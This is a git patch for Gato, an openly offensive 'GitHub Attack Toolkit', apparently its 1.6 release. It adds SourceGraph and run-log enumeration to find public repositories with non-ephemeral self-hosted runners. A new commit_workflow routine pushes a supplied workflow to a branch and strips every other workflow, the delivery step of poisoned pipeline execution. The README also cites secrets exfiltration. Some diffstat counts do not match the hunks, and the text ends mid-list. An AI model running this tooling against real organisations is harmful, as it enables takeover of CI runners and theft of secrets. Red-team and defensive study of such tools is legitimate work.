From 8683d3350db0846f3666bba7c763a7447aa83055 Mon Sep 17 00:00:00 2001
From: Adnan Khan <AdnaneKhan@users.noreply.github.com>
Date: Sat, 23 Dec 2023 16:08:14 -0500
Subject: [PATCH] Release 1.6 (#58)

Co-authored-by: Mason Davis <31484153+mas0nd@users.noreply.github.com>
Co-authored-by: Remy <remy.trompier@gmail.com>
---
 README.md                               |  50 +++--
 gato/attack/attack.py                   |  13 +-
 gato/cli/cli.py                         |  52 ++++-
 gato/enumerate/enumerate.py             |  15 +-
 gato/enumerate/recommender.py           |   7 +-
 gato/enumerate/repository.py            |  63 +++++-
 gato/github/__init__.py                 |   1 +
 gato/github/api.py                      | 272 ++++++++++++++++++++++--
 gato/github/gql_queries.py              |  54 +++++
 gato/github/search.py                   |   2 +-
 gato/models/runner.py                   |   7 +-
 gato/search/search.py                   |  82 ++++++-
 gato/workflow_parser/workflow_parser.py |  78 ++++++-
 pyproject.toml                          |   2 +-
 test/test_cases.json                    |   2 +-
 unit_test/test_api.py                   |  98 ++++++++-
 unit_test/test_enumerate.py             |  10 +-
 unit_test/test_repo_enumerate.py        |   4 +-
 18 files changed, 723 insertions(+), 89 deletions(-)
 create mode 100644 gato/github/gql_queries.py

diff --git a/README.md b/README.md
index a2d5be7..d1ab5fe 100644
--- a/README.md
+++ b/README.md
@@ -8,28 +8,43 @@
 
 
 Gato, or GitHub Attack Toolkit, is an enumeration and attack tool that allows both 
-blue teamers and offensive security practitioners to evaluate the blast radius 
-of a compromised personal access token within a GitHub organization.
+blue teamers and offensive security practitioners to identify and exploit 
+pipeline vulnerabilities within a GitHub organization's public and private 
+repositories.
 
-The tool also allows searching for and thoroughly enumerating public
-repositories that utilize self-hosted runners. GitHub recommends that
-self-hosted runners only be utilized for private repositories, however, there
-are thousands of organizations that utilize self-hosted runners.
+The tool has post-exploitation features to leverage a compromised personal
+access token, in addition to enumeration features that identify poisoned pipeline
+execution vulnerabilities in public repositories that use self-hosted GitHub Actions
+runners.
 
-## Version 1.5 Released
+GitHub recommends that self-hosted runners only be utilized for private repositories; however, there are thousands of organizations that utilize self-hosted runners with public repositories. Default configurations are often vulnerable, and Gato uses a mix of workflow file analysis and run-log analysis to identify potentially vulnerable repositories at scale.
 
-Gato version 1.5 was released on June 27th, 2023!
+## Version 1.6
 
-#### New Features
+Gato version 1.6 improves the public repository enumeration feature set.
 
-* Secrets Enumeration
-* Secrets Exfiltration
-* API-only Enumeration
-* JSON Output
-* Improved Code Search
-* GitHub Enterprise Server Support
-* PAT Validation Only Mode
-* Quality of life and UX improvements
+Previously, Gato's code search functionality by default only looked for
+yaml files that explicitly had "self-hosted" in the name. Now, the
+code search functionality supports a SourceGraph query. This query has a 
+lower false negative rate and is not limited by GitHub's code search limit.
+
+For example, the following command will identify public repositories that use
+self-hosted runners:
+
+`gato search --sourcegraph --output-text public_repos.txt`
+
+This can be fed back into Gato's enumeration feature:
+
+`gato enumerate --repositories public_repos.txt --output-json enumeration_results.json`
+
+Additionally, the release contains several improvements under the hood to speed up the enumeration process. This includes changes to limit redundant run-log downloads (which are the slowest part of Gato's enumeration process) and using the GraphQL API to download workflow files when enumerating an entire organization. Finally, Gato will use a heuristic to detect if an attached runner is non-ephemeral. Most poisoned pipeline execution attacks require a non-ephemeral runner in order to succeed.
+
+### New Features
+
+* SourceGraph Search Functionality
+* Improved Public Repository Enumeration Speed
+* Improved Workflow File Analysis
+* Non-ephemeral self-hosted runner detection
 
 ## Who is it for?
 
@@ -44,6 +59,7 @@ Gato version 1.5 was released on June 27th, 2023!
 
 * GitHub Classic PAT Privilege Enumeration
 * GitHub Code Search API-based enumeration
+* SourceGraph Search enumeration
 * GitHub Action Run Log Parsing to identify Self-Hosted Runners
 * Bulk Repo Sparse Clone Features
 * GitHub Action Workflow Parsing
diff --git a/gato/attack/attack.py b/gato/attack/attack.py
index e830c2c..d22a502 100644
--- a/gato/attack/attack.py
+++ b/gato/attack/attack.py
@@ -181,28 +181,23 @@ def __execute_and_wait_workflow(
         """
 
         workflow_id = None
-        branch_created = self.api.create_branch(target_repo, branch)
-
-        if not branch_created:
-            Output.error("Failed to create branch!")
-            return False
 
         if self.author_email and self.author_name:
-            rev_hash = self.api.commit_file(
+            rev_hash = self.api.commit_workflow(
                 target_repo,
                 branch,
-                f".github/workflows/{yaml_name}.yml",
                 yaml_contents.encode(),
+                f"{yaml_name}.yml",
                 commit_author=self.author_name,
                 commit_email=self.author_email,
                 message=commit_message
             )
         else:
-            rev_hash = self.api.commit_file(
+            rev_hash = self.api.commit_workflow(
                 target_repo,
                 branch,
-                f".github/workflows/{yaml_name}.yml",
                 yaml_contents.encode(),
+                f"{yaml_name}.yml",
                 message=commit_message
             )
 
diff --git a/gato/cli/cli.py b/gato/cli/cli.py
index 849af48..ef476c2 100644
--- a/gato/cli/cli.py
+++ b/gato/cli/cli.py
@@ -276,19 +276,35 @@ def search(args, parser):
         http_proxy=args.http_proxy,
         github_url=args.api_url
     )
+    if args.sourcegraph:
+        if args.query and args.target:
+            parser.error(
+                f"{Fore.RED}[-]{Style.RESET_ALL} You cannot select an organization "
+                "with a custom query!"
+            )
 
-    if not (args.query or args.target):
-        parser.error(
-            f"{Fore.RED}[-]{Style.RESET_ALL} You must select an organization "
-            "or pass a custom query!."
-        )
-
-    if args.query:
-        gh_search_runner.use_search_api(
-            organization=args.target, query=args.query
+        results = gh_search_runner.use_sourcegraph_api(
+            organization=args.target,
+            query=args.query
         )
     else:
-        gh_search_runner.use_search_api(organization=args.target)
+        if not (args.query or args.target):
+            parser.error(
+                f"{Fore.RED}[-]{Style.RESET_ALL} You must select an organization "
+                "or pass a custom query!."
+            )
+        if args.query:
+            results = gh_search_runner.use_search_api(
+                organization=args.target,
+                query=args.query
+            )
+        else:
+            results = gh_search_runner.use_search_api(
+                organization=args.target
+            )
+
+    if results:
+        gh_search_runner.present_results(results, args.output_text)
 
 
 def configure_parser_general(parser):
@@ -563,3 +579,19 @@ def configure_parser_search(parser):
         metavar="QUERY",
         required=False
     )
+
+    parser.add_argument(
+        "--sourcegraph", "-sg",
+        help="Use Sourcegraph API to search for self-hosted runners.",
+        required=False,
+        action="store_true"
+    )
+
+    parser.add_argument(
+        "--output-text", "-oT",
+        help=(
+            "Save enumeration output to text file."
+        ),
+        metavar="TEXT_FILE",
+        type=StringType(256)
+    )
diff --git a/gato/enumerate/enumerate.py b/gato/enumerate/enumerate.py
index c5ed134..3ac1254 100644
--- a/gato/enumerate/enumerate.py
+++ b/gato/enumerate/enumerate.py
@@ -1,6 +1,7 @@
 import logging
 
 from gato.github import Api
+from gato.github import GqlQueries
 from gato.models import Repository, Organization
 from gato.cli import Output
 from gato.enumerate.repository import RepositoryEnum
@@ -173,12 +174,22 @@ def enumerate_organization(self, org: str):
             f"the {organization.name} organization!"
         )
 
+        Output.info(f"Querying and caching workflow YAML files!")
+        wf_queries = GqlQueries.get_workflow_ymls(enum_list)
+  
+        for wf_query in wf_queries:
+            result = self.org_e.api.call_post('/graphql', wf_query)
+            # Sometimes we don't get a 200, fall back in this case.
+            if result.status_code == 200:
+                self.repo_e.construct_workflow_cache(result.json()['data']['nodes'])
+            else:
+                Output.warn("GraphQL query failed, will revert to REST workflow query for impacted repositories!")
         for repo in enum_list:
-
             Output.tabbed(
                 f"Enumerating: {Output.bright(repo.name)}!"
             )
-            self.repo_e.enumerate_repository(repo)
+
+            self.repo_e.enumerate_repository(repo, large_org_enum=len(enum_list) > 100)
             self.repo_e.enumerate_repository_secrets(repo)
 
             Recommender.print_repo_secrets(
diff --git a/gato/enumerate/recommender.py b/gato/enumerate/recommender.py
index c391961..9ecee80 100644
--- a/gato/enumerate/recommender.py
+++ b/gato/enumerate/recommender.py
@@ -140,7 +140,7 @@ def print_repo_runner_info(repository: Repository):
             Output.result(
                 f"The repository contains a workflow: "
                 f"{Output.bright(repository.sh_workflow_names[0])} that "
-                "executes on self-hosted runners!"
+                "might execute on self-hosted runners!"
             )
 
         if repository.accessible_runners:
@@ -157,6 +157,11 @@ def print_repo_runner_info(repository: Repository):
                 f"{Output.bright(repository.accessible_runners[0].machine_name)}"
             )
 
+            for runner in repository.accessible_runners:
+                if runner.non_ephemeral:
+                    Output.owned("The repository contains a non-ephemeral self-hosted runner!")
+                    break
+
         if repository.runners:
             Output.result(
                 f"The repository has {len(repository.runners)} repo-level"
diff --git a/gato/enumerate/repository.py b/gato/enumerate/repository.py
index 58e7a3c..dfc2885 100644
--- a/gato/enumerate/repository.py
+++ b/gato/enumerate/repository.py
@@ -21,6 +21,7 @@ def __init__(self, api: Api, skip_log: bool, output_yaml):
             api (Api): GitHub API wraper object.
         """
         self.api = api
+        self.workflow_cache = {}
         self.skip_log = skip_log
         self.output_yaml = output_yaml
 
@@ -40,11 +41,12 @@ def __perform_runlog_enumeration(self, repository: Repository):
         )
 
         if wf_runs:
-            runner = Runner(
-                wf_runs[0]['runner_name'], wf_runs[0]['machine_name']
-            )
+            for wf_run in wf_runs:
+                runner = Runner(
+                    wf_run['runner_name'], wf_run['machine_name'], non_ephemeral=wf_run['non_ephemeral']
+                )
 
-            repository.add_accessible_runner(runner)
+                repository.add_accessible_runner(runner)
             runner_detected = True
 
         return runner_detected
@@ -60,12 +62,15 @@ def __perform_yml_enumeration(self, repository: Repository):
             list: List of workflows that execute on sh runner, empty otherwise.
         """
         runner_wfs = []
-        ymls = self.api.retrieve_workflow_ymls(repository.name)
+
+        if repository.name in self.workflow_cache:
+            ymls = self.workflow_cache[repository.name]
+        else:
+            ymls = self.api.retrieve_workflow_ymls(repository.name)
 
         for (wf, yml) in ymls:
             try:
                 parsed_yml = WorkflowParser(yml, repository.name, wf)
-
                 self_hosted_jobs = parsed_yml.self_hosted()
 
                 if self_hosted_jobs:
@@ -79,12 +84,13 @@ def __perform_yml_enumeration(self, repository: Repository):
             # At this point we only know the extension, so handle and
             #  ignore malformed yml files.
             except Exception as parse_error:
-                print(parse_error)
+
+                print(f"{wf}: {str(parse_error)}")
                 logger.warning("Attmpted to parse invalid yaml!")
 
         return runner_wfs
 
-    def enumerate_repository(self, repository: Repository):
+    def enumerate_repository(self, repository: Repository, large_org_enum=False):
         """Enumerate a repository, and check everything relevant to
         self-hosted runner abuse that that the user has permissions to check.
 
@@ -119,15 +125,25 @@ def enumerate_repository(self, repository: Repository):
 
                 repository.set_runners(repo_runners)
 
-        if not self.skip_log and self.__perform_runlog_enumeration(repository):
-            runner_detected = True
-
         workflows = self.__perform_yml_enumeration(repository)
 
         if len(workflows) > 0:
             repository.add_self_hosted_workflows(workflows)
             runner_detected = True
 
+        if not self.skip_log:
+            # If we are enumerating an organization, only enumerate runlogs if
+            # the workflow suggests a sh_runner.
+            if large_org_enum and runner_detected:
+                self.__perform_runlog_enumeration(repository)
+
+            # If we are doing internal enum, get the logs, because coverage is
+            # more important here and it's ok if it takes time.
+            elif not repository.is_public() and self.__perform_runlog_enumeration(repository):
+                runner_detected = True
+            else:
+                runner_detected = self.__perform_runlog_enumeration(repository)
+
         if runner_detected:
             # Only display permissions (beyond having none) if runner is
             # detected.
@@ -158,3 +174,28 @@ def enumerate_repository_secrets(
 
             if org_secrets:
                 repository.set_accessible_org_secrets(org_secrets)
+
+    def construct_workflow_cache(self, yml_results):
+        """Creates a cache of workflow yml files retrieved from graphQL. Since
+        graphql and REST do not have parity, we still need to use rest for most
+        enumeration calls. This method saves off all yml files, so during org
+        level enumeration if we perform yml enumeration the cached file is used
+        instead of making github REST requests. 
+
+        Args:
+            yml_results (list): List of results from individual GraphQL queries
+            (100 nodes at a time).
+        """
+        for result in yml_results:
+            owner = result['nameWithOwner']
+
+            self.workflow_cache[owner] = list()
+
+            if not result['object']:
+                continue
+
+            for yml_node in result['object']['entries']:
+                yml_name = yml_node['name']
+                if yml_name.lower().endswith('yml') or yml_name.lower().endswith('yaml'):
+                    contents = yml_node['object']['text']
+                    self.workflow_cache[owner].append((yml_name, contents))
diff --git a/gato/github/__init__.py b/gato/github/__init__.py
index a0f8375..284d7c1 100644
--- a/gato/github/__init__.py
+++ b/gato/github/__init__.py
@@ -1,2 +1,3 @@
 from .api import Api
+from .gql_queries import GqlQueries
 from .search import Search
diff --git a/gato/github/api.py b/gato/github/api.py
index f8629b3..77807cc 100644
--- a/gato/github/api.py
+++ b/gato/github/api.py
@@ -8,7 +8,7 @@
 import io
 
 from gato.cli import Output
-from datetime import datetime, timezone
+from datetime import datetime, timezone, timedelta
 
 logger = logging.getLogger(__name__)
 
@@ -19,8 +19,9 @@ class Api():
     rate limiting or network issues.
     """
 
-    RUNNER_RE = re.compile(r'Runner name: \'([\w+-]+)\'')
-    MACHINE_RE = re.compile(r'Machine name: \'([\w+-]+)\'')
+    RUNNER_RE = re.compile(r'Runner name: \'([\w+-.]+)\'')
+    MACHINE_RE = re.compile(r'Machine name: \'([\w+-.]+)\'')
+    RUN_THRESHOLD = 90
 
     def __init__(self, pat: str, version: str = "2022-11-28",
                  http_proxy: str = None, socks_proxy: str = None,
@@ -110,12 +111,29 @@ def __process_run_log(self, log_content: bytes, run_info: dict):
         Returns:
             dict: metadata about the run execution.
         """
-        with zipfile.ZipFile(io.BytesIO(log_content)) as runres:
+        log_package = None
+        non_ephemeral = False
 
+        with zipfile.ZipFile(io.BytesIO(log_content)) as runres:
             for zipinfo in runres.infolist():
+                # TODO use a lambda for this messy logic
+                if "checkout" in zipinfo.filename or "Checkout" in zipinfo.filename:
+                    with runres.open(zipinfo) as run_setup:
+                        content = run_setup.read().decode()
+                        if "Cleaning the repository" in content:
+                            non_ephemeral = True
+
+                        if log_package:
+                            log_package['non_ephemeral'] = non_ephemeral
+
                 if "Set up job" in zipinfo.filename:
                     with runres.open(zipinfo) as run_setup:
                         content = run_setup.read().decode()
+                        if "Image Release: https://github.com/actions/runner-images" in content:
+                            # Larger runners will appear to be self-hosted, but
+                            # they will have the image name. Skip if we see this.
+                            continue
+
                         if "Runner name" in content or \
                                 "Machine name" in content:
 
@@ -132,9 +150,10 @@ def __process_run_log(self, log_content: bytes, run_info: dict):
                                 "runner_name": runner_name,
                                 "machine_name": hostname,
                                 "run_id": run_info["id"],
-                                "run_attempt": run_info["run_attempt"]
+                                "run_attempt": run_info["run_attempt"],
+                                "non_ephemeral": non_ephemeral
                             }
-                            return log_package
+        return log_package
 
     def __get_full_runlog(self, log_content: bytes, run_name: str):
         """Gets the full text of the runlog from the zip file by matching the
@@ -155,6 +174,24 @@ def __get_full_runlog(self, log_content: bytes, run_name: str):
 
                         return content
 
+    @staticmethod
+    def __verify_result(response: requests.Response, expected_code: int):
+        """Verifies that the response matches the expected code. If it does not
+        match, then the mismatch is logged and False is returned.
+
+        Args:
+            response (requests.Response): Response object from a request.
+            expected_code (int): Expected status code from the request.
+        """
+        if response.status_code != expected_code:
+            logger.warn(
+                f"Expected status code {expected_code}, but got "
+                f"{response.status_code}!"
+            )
+            logger.debug(response.text)
+            return False
+        return True
+
     def call_get(self, url: str, params: dict = None, strip_auth=False):
         """Internal method to wrap a GET request so that proxies and headers
         do not need to be repeated.
@@ -212,8 +249,34 @@ def call_post(self, url: str, params: dict = None):
 
         return api_response
 
+    def call_patch(self, url: str, params: dict = None):
+        """Internal method to wrap a PATCH request so that proxies and headers
+        do not need to be updated in each method.
+
+        Args:
+            url (str): URL path to make PATCH request to.
+            params (dict, optional): Parameters to send as part of the request.
+            Defaults to None.
+        Returns:
+            Response: Returns the requests response object.
+        """
+        request_url = self.github_url + url
+        logger.debug(f'Making PATCH API request to {request_url}!')
+
+        api_response = requests.patch(request_url, headers=self.headers,
+                                      proxies=self.proxies, json=params,
+                                      verify=self.verify_ssl)
+        logger.debug(
+            f'The PATCH request to {request_url} returned a '
+            f'{api_response.status_code}!')
+
+        self.__check_rate_limit(api_response.headers)
+
+        return api_response
+
     def call_put(self, url: str, params: dict = None):
-        """_summary_
+        """Internal method to wrap a PUT request so that proxies and headers
+        do not need to be updated in each method.
 
         Args:
             url (stre): _description_
@@ -601,30 +664,59 @@ def retrieve_run_logs(self, repo_name: str, short_circuit: str = True):
         Returns:
             list: List of run logs for runs that ran on self-hosted runners.
         """
-        runs = self.call_get(f'/repos/{repo_name}/actions/runs')
+        start_date = datetime.now() - timedelta(days = 60)
+        runs = self.call_get(
+            f'/repos/{repo_name}/actions/runs', params={
+                "per_page": "30",
+                "status":"completed",
+                "exclude_pull_requests": "true",
+                "created":f">{start_date.isoformat()}"
+            }
+        )
 
-        run_logs = []
+        # This is a dictionary so we can de-duplicate runner IDs based on
+        # the machine_name:runner_name.
+        run_logs = {}
+        names = set()
 
         if runs.status_code == 200:
             logger.debug(f'Enumerating runs within {repo_name}')
             for run in runs.json()['workflow_runs']:
+
+                # We are only interested in runs that actually executed.
+                if run['conclusion'] != 'success' and \
+                    run['conclusion'] != 'failure':
+                    continue
+
+                if short_circuit:                
+                    # If we are only looking for the presence of SH runners and
+                    # not trying to determine ephemeral vs not from repeats, then
+                    # we just need to look at each branch + wf combination once.
+                    workflow_key = f"{run['head_branch']}:{run['path']}"
+                    if workflow_key in names:
+                        continue                
+                    names.add(workflow_key)
+
                 run_log = self.call_get(
                     f'/repos/{repo_name}/actions/runs/{run["id"]}/'
                     f'attempts/{run["run_attempt"]}/logs')
-
                 if run_log.status_code == 200:
                     run_log = self.__process_run_log(run_log.content, run)
                     if run_log:
-                        run_logs.append(run_log)
+                        key = f"{run_log['machine_name']}:{run_log['runner_name']}"
+                        run_logs[key] = run_log
+
                         if short_circuit:
-                            return run_logs
+                            return run_logs.values()
+                elif run_log.status_code == 410:
+                    break
                 else:
                     logger.debug(
                         f"Call to retrieve run logs from {repo_name} run "
                         f"{run['id']} attempt {run['run_attempt']} returned "
                         f"{run_log.status_code}!")
 
-        return run_logs
+        return run_logs.values()
 
     def parse_workflow_runs(self, repo_name: str):
         """Returns the number of workflow runs associated with the repository.
@@ -671,12 +763,12 @@ def get_recent_workflow(self, repo_name: str, sha: str, file_name: str):
 
         if data['total_count'] == 0:
             return 0
-        
+
         # find the id of our malicious workflow
         for workflow in data['workflow_runs']:
             if f'.github/workflows/{file_name}.yml' in workflow['path']:
                 return workflow['id']
-            
+
         return 0
 
     def get_workflow_status(self, repo_name: str, workflow_id: int):
@@ -763,12 +855,14 @@ def create_branch(self, repo_name: str, branch_name: str):
             repo_name (str): Name of repository in Org/Repo format.
             branch_name (str): Name of branch to create.
         """
-
-        resp = self.call_get(f'/repos/{repo_name}/git/refs/heads')
+        resp = self.call_get(f'/repos/{repo_name}')
+        default_branch = resp.json()['default_branch']
+        resp = self.call_get(
+            f'/repos/{repo_name}/git/ref/heads/{default_branch}'
+        )
 
         json_resp = resp.json()
-
-        sha = json_resp[0]['object']['sha']
+        sha = json_resp['object']['sha']
 
         branch_data = {
             "ref": f"refs/heads/{branch_name}",
@@ -942,3 +1036,143 @@ def get_repo_org_secrets(self, repo_name: str):
                 secrets = secrets_response['secrets']
 
         return secrets
+
+    def commit_workflow(self, repo_name: str,
+                        target_branch: str,
+                        workflow_contents: bytes, file_name: str,
+                        commit_author: str = "Gato",
+                        commit_email: str = "gato@gato.infosec",
+                        message="Testing"):
+        """
+        Commits a new workflow file to a specified repository.
+
+        This function performs the following steps:
+        1. Gets the latest commit SHA of the repository's default branch.
+        2. Gets the tree SHA of that commit.
+        3. Gets the recursive tree and finds existing .github/workflows blobs.
+        4. Creates a blob for the new workflow and a new tree that adds it and
+           removes every other blob under .github/workflows.
+        5. Creates a new commit that uses the new tree.
+        6. Creates the target branch ref pointing to the new commit.
+
+        Args:
+            repo_name (str): The name of the repository.
+            target_branch (str): The name of the target branch.
+            workflow_contents (bytes): The content of the new workflow file.
+            file_name (str): The name of the new workflow file.
+            commit_author (str, optional): The author of the commit. Defaults to "Gato".
+            commit_email (str, optional): The email of the commit author. Defaults to "gato@gato.infosec".
+            message (str, optional): The commit message. Defaults to "Testing".
+
+        Returns:
+            str: The SHA of the new commit if the commit was successful, None otherwise.
+        """
+        # Step 1: Get latest commit SHA of the default branch
+        r = self.call_get(
+            f'/repos/{repo_name}'
+        )
+        if self.__verify_result(r, 200) is False:
+            return None
+        default_branch = r.json()['default_branch']
+
+        r = self.call_get(
+            f'/repos/{repo_name}/commits/{default_branch}'
+        )
+        if self.__verify_result(r, 200) is False:
+            return None
+        latest_commit_sha = r.json()['sha']
+
+        # Step 2: Get tree SHA of latest commit of default
+        r = self.call_get(
+            f'/repos/{repo_name}/git/commits/{latest_commit_sha}'
+        )
+        if self.__verify_result(r, 200) is False:
+            return None
+        tree_sha = r.json()['tree']['sha']
+
+        # Step 3: Get the tree of the .github/workflows directory
+        r = self.call_get(
+            f'/repos/{repo_name}/git/trees/{tree_sha}',
+            params={"recursive": "1"}
+        )
+        if self.__verify_result(r, 200) is False:
+            return None
+
+        base_sha = r.json()['sha']
+        tree = r.json()['tree']
+
+        existing_files = (item for item in tree if '.github/workflows' in
+                          item['path'] and item['type'] == 'blob')
+
+        # Step 4: Create a new tree where all blobs in the .github/workflows
+        # tree are removed
+        new_workflow_file_content = base64.b64encode(
+                workflow_contents
+        ).decode()
+
+        r = self.call_post(f'/repos/{repo_name}/git/blobs', params={
+            "content": new_workflow_file_content,
+            "encoding": "base64"
+        })
+        if self.__verify_result(r, 201) is False:
+            return None
+
+        new_tree = [
+            {
+                'path': f'.github/workflows/{file_name}',
+                'mode': '100644',
+                'type': 'blob',
+                'sha': r.json()['sha']
+            }
+        ]
+
+        # Delete everything else
+        for existing in existing_files:
+            # Don't delete the same file - this will happen if the workflow
+            # already exists (such as a test.yml file)
+            if existing['path'] == f'.github/workflows/{file_name}':
+                continue
+
+            new_tree.append({
+                'path': existing['path'],
+                'mode': existing['mode'],
+                'type': existing['type'],
+                'sha': None,
+            })
+
+        r = self.call_post(
+            f'/repos/{repo_name}/git/trees', params={
+                'base_tree': base_sha,
+                'tree': new_tree
+            }
+        )
+        if self.__verify_result(r, 201) is False:
+            return None
+        new_tree_sha = r.json()['sha']
+
+        # Step 5: Create new commit on new branch
+        r = self.call_post(
+            f'/repos/{repo_name}/git/commits', params={
+                'message': message,
+                'tree': new_tree_sha,
+                'parents': [latest_commit_sha],
+                'author': {
+                    'name': commit_author,
+                    'email': commit_email
+                }
+            }
+        )
+        new_commit_sha = r.json()['sha']
+
+        # Step 6: Create the target branch ref pointing to the new commit
+        r = self.call_post(
+            f'/repos/{repo_name}/git/refs',
+            params={
+                'sha': new_commit_sha,
+                'ref': f'refs/heads/{target_branch}'
+            }
+        )
+        if self.__verify_result(r, 201) is False:
+            return None
+
+        return new_commit_sha
diff --git a/gato/github/gql_queries.py b/gato/github/gql_queries.py
new file mode 100644
index 0000000..177c459
--- /dev/null
+++ b/gato/github/gql_queries.py
@@ -0,0 +1,62 @@
+from gato.models import Repository
+
+class GqlQueries():
+    """Constructs graphql queries for use with the GitHub GraphQL api.
+    """
+
+    # Upper bound on how many repository node IDs are packed into one query.
+    BATCH_SIZE = 100
+
+    # Fetches every entry under .github/workflows/ at HEAD (name, type, mode
+    # and, for blobs, size and text) for each repository node ID supplied.
+    GET_YMLS = """
+        query RepoFiles($node_ids: [ID!]!) {
+        nodes(ids: $node_ids) {
+            ... on Repository {
+            nameWithOwner
+            object(expression: "HEAD:.github/workflows/") {
+                ... on Tree {
+                entries {
+                    name
+                    type
+                    mode
+                    object {
+                    ... on Blob {
+                        byteSize
+                        text
+                    }
+                    }
+                }
+                }
+            }
+            }
+        }
+        }
+    """
+
+    @staticmethod
+    def get_workflow_ymls(repos: list):
+        """Retrieve workflow yml files for each repository.
+
+        The repositories are split into consecutive batches of at most
+        ``BATCH_SIZE`` and one query is built per batch, so an empty list
+        yields no queries and an exact multiple of the batch size does not
+        produce a trailing query with no node IDs.
+
+        Args:
+            repos (List[Repository]): List of repository objects
+        Returns:
+            (list): List of JSON post parameters for each graphQL query.
+        """
+        queries = []
+
+        for start in range(0, len(repos), GqlQueries.BATCH_SIZE):
+            batch = repos[start:start + GqlQueries.BATCH_SIZE]
+            queries.append({
+                "query": GqlQueries.GET_YMLS,
+                "variables": {
+                    "node_ids": [repo.repo_data['node_id'] for repo in batch]
+                }
+            })
+
+        return queries
\ No newline at end of file
diff --git a/gato/github/search.py b/gato/github/search.py
index c793c00..88adf6c 100644
--- a/gato/github/search.py
+++ b/gato/github/search.py
@@ -46,7 +46,7 @@ def search_enumeration(
         if custom_query:
             query['q'] = custom_query
         else:
-            query['q'] = f'self-hosted org:{organization} language:yaml path:.github/workflows',
+            query['q'] = f'self-hosted org:{organization} language:yaml path:.github/workflows'
 
         next_page = f"/search/code?q={query['q']}&sort={query['sort']}" \
                     f"&per_page={query['per_page']}&page={query['page']}"
diff --git a/gato/models/runner.py b/gato/models/runner.py
index 5739a12..96626f6 100644
--- a/gato/models/runner.py
+++ b/gato/models/runner.py
@@ -11,7 +11,8 @@ def __init__(
             machine_name=None,
             os=None,
             status=None,
-            labels=[]):
+            labels=[],
+            non_ephemeral=False):
         """Constructor for runner wrapper object.
 
         Args:
@@ -27,6 +28,7 @@ def __init__(
         self.os = os
         self.status = status
         self.labels = labels
+        self.non_ephemeral = non_ephemeral
 
     def toJSON(self):
         """Converts the repository to a Gato JSON representation.
@@ -37,7 +39,8 @@ def toJSON(self):
             else "Unknown",
             "os": self.os if self.os else "Unknown",
             "status": self.status if self.status else "Unknown",
-            "labels": [label for label in self.labels]
+            "labels": [label for label in self.labels],
+            "non_ephemeral": self.non_ephemeral
         }
 
         return representation
diff --git a/gato/search/search.py b/gato/search/search.py
index db071bf..355ccde 100644
--- a/gato/search/search.py
+++ b/gato/search/search.py
@@ -1,4 +1,6 @@
 import logging
+import requests
+import json
 
 from gato.github import Search
 from gato.github import Api
@@ -57,6 +59,100 @@ def __setup_user_info(self):
 
         return True
 
+    def use_sourcegraph_api(
+            self,
+            organization: str,
+            query=None,
+            output_text=None):
+        """
+        Search Sourcegraph for repositories whose workflows may use
+        self-hosted runners.
+
+        A GET request is sent to the Sourcegraph streaming search endpoint
+        and the response is read line by line. Each line starting with
+        ``data:`` is parsed as JSON; when the payload is a list, every
+        object in it that has a ``repository`` field contributes that
+        value, with any ``github.com/`` text removed, to the result set.
+
+        Args:
+            organization (str): The name of the organization to search in.
+                A falsy value searches without a repository filter.
+            query (str, optional): A custom search query. If not provided,
+                a default query is used.
+            output_text (str, optional): Not used by this method.
+
+        Returns:
+            set: The repository names found. Empty when the response
+            status is not 200.
+        """
+        repo_filter = f"repo:{organization}/ " if organization else ""
+        url = "https://sourcegraph.com/.api/search/stream"
+        headers = {"Content-Type": "application/json"}
+        params = {
+            "q": (
+                "('self-hosted' OR "
+                "(/runs-on/ AND NOT "
+                "/(ubuntu-16.04|ubuntu-18.04|ubuntu-20.04|ubuntu-22.04|ubuntu-latest|"
+                "windows-2019|windows-2022|windows-latest|macos-11|macos-12|macos-13|"
+                "macos-12-xl|macos-13-xl|macos-latest|matrix.[a-zA-Z]\\s)/)) "
+                f"{repo_filter}"
+                "lang:YAML file:.github/workflows/ count:30000"
+            )
+        }
+        if query:
+            Output.info(
+                f"Searching SourceGraph with the following query: {Output.bright(query)}"
+            )
+            params["q"] = query
+        else:
+            Output.info(
+                f"Searching SourceGraph with the default Gato query: {Output.bright(params['q'])}"
+            )
+
+        results = set()
+        data_prefix = "data:"
+
+        # The timeout bounds the connection attempt and each wait for more
+        # streamed data, so a stalled server cannot block the search forever.
+        response = requests.get(
+            url, headers=headers, params=params, stream=True, timeout=60
+        )
+        try:
+            if response.status_code != 200:
+                Output.info(
+                    "SourceGraph search failed with status code "
+                    f"{response.status_code}."
+                )
+                return results
+
+            for line in response.iter_lines():
+                if not line:
+                    continue
+
+                decoded = line.decode()
+                if not decoded.startswith(data_prefix):
+                    continue
+
+                # Drop only the leading marker; the payload itself may
+                # contain the text "data:".
+                event = json.loads(decoded[len(data_prefix):].strip())
+
+                # Only list payloads are scanned; iterating a JSON object
+                # would walk its keys instead of result entries.
+                if not isinstance(event, list):
+                    continue
+
+                for element in event:
+                    if isinstance(element, dict) and "repository" in element:
+                        results.add(
+                            element["repository"].replace("github.com/", "")
+                        )
+        finally:
+            # Release the streamed connection even if parsing fails.
+            response.close()
+
+        return results
+
     def use_search_api(self, organization: str, query=None):
         """Utilize GitHub Code Search API to try and identify repositories
         using self-hosted runners. This is subject to a high false-positive
@@ -95,10 +153,30 @@ def use_search_api(self, organization: str, query=None):
             organization, custom_query=query
         )
 
+        return candidates
+
+    def present_results(self, results, output_text=None):
+        """
+        Report search results to the user and optionally save them.
+
+        Prints how many repositories matched, then, if ``output_text`` is
+        set, writes one result per line to that file (truncating it), and
+        finally prints each result through ``Output.tabbed``.
+
+        Args:
+            results (iterable): Sized collection of matching repositories.
+            output_text (str, optional): Path of the file the results
+            should be written to. Defaults to None.
+        """
         Output.result(
-            f"Identified {len(candidates)} non-fork repositories that matched "
+            f"Identified {len(results)} non-fork repositories that matched "
             "the criteria!"
         )
 
-        for candidate in candidates:
+        if output_text:
+            with open(output_text, "w") as file_output:
+                for candidate in results:
+                    file_output.write(f"{candidate}\n")
+
+        for candidate in results:
             Output.tabbed(candidate)
diff --git a/gato/workflow_parser/workflow_parser.py b/gato/workflow_parser/workflow_parser.py
index 3e82ecd..f90d4ce 100644
--- a/gato/workflow_parser/workflow_parser.py
+++ b/gato/workflow_parser/workflow_parser.py
@@ -2,6 +2,7 @@
 import yaml
 from pathlib import Path
 import os
+import re
 
 logger = logging.getLogger(__name__)
 
@@ -16,6 +17,35 @@ class WorkflowParser():
     as the project grows in capability.
     """
 
+    # Runner labels treated as GitHub-hosted when deciding whether a job
+    # might run on a self-hosted runner.
+    GITHUB_HOSTED_LABELS = [
+        'ubuntu-latest',
+        'macos-latest',
